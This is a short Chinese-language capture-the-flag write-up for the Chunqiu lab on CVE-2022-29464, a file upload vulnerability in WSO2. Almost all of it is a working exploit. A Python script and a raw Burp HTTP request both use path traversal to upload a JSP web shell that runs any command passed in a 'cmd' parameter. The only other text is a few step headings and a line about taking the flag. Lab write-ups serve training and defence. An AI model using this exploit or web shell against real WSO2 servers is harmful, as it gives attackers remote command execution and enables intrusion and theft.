春秋云镜CVE-2022-29464 （WSO2文件上传漏洞）

目录

一：访问靶机：

2：根据提示知道可以文件上传

3：两个方法

一：访问靶机：

2：根据提示知道可以文件上传

3：我们两个方法
1：使用EXP
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = input("请输入URL：")
file = "shell.jsp"
payload = """

<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"
"; } } catch(IOException e) { e.printStackTrace(); } } %>

<%=output %>

"""

files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {url}/authenticationendpoint/{file}")

直接访问。拿到flag

2：使用burp抓包修改参数

poc
POST /fileupload/toolsAny HTTP/1.1
Host: eci-2ze2knq7i9q2kvy9rhta.cloudeci1.ichunqiu.com:9443
Accept: /
Accept-Encoding: gzip, deflate
Content-Length: 901
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"

<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"
"; } } catch(IOException e) { e.printStackTrace(); } } %>

<%=output %>

--4ef9f369a86bfaadf5ec3177278d49c0--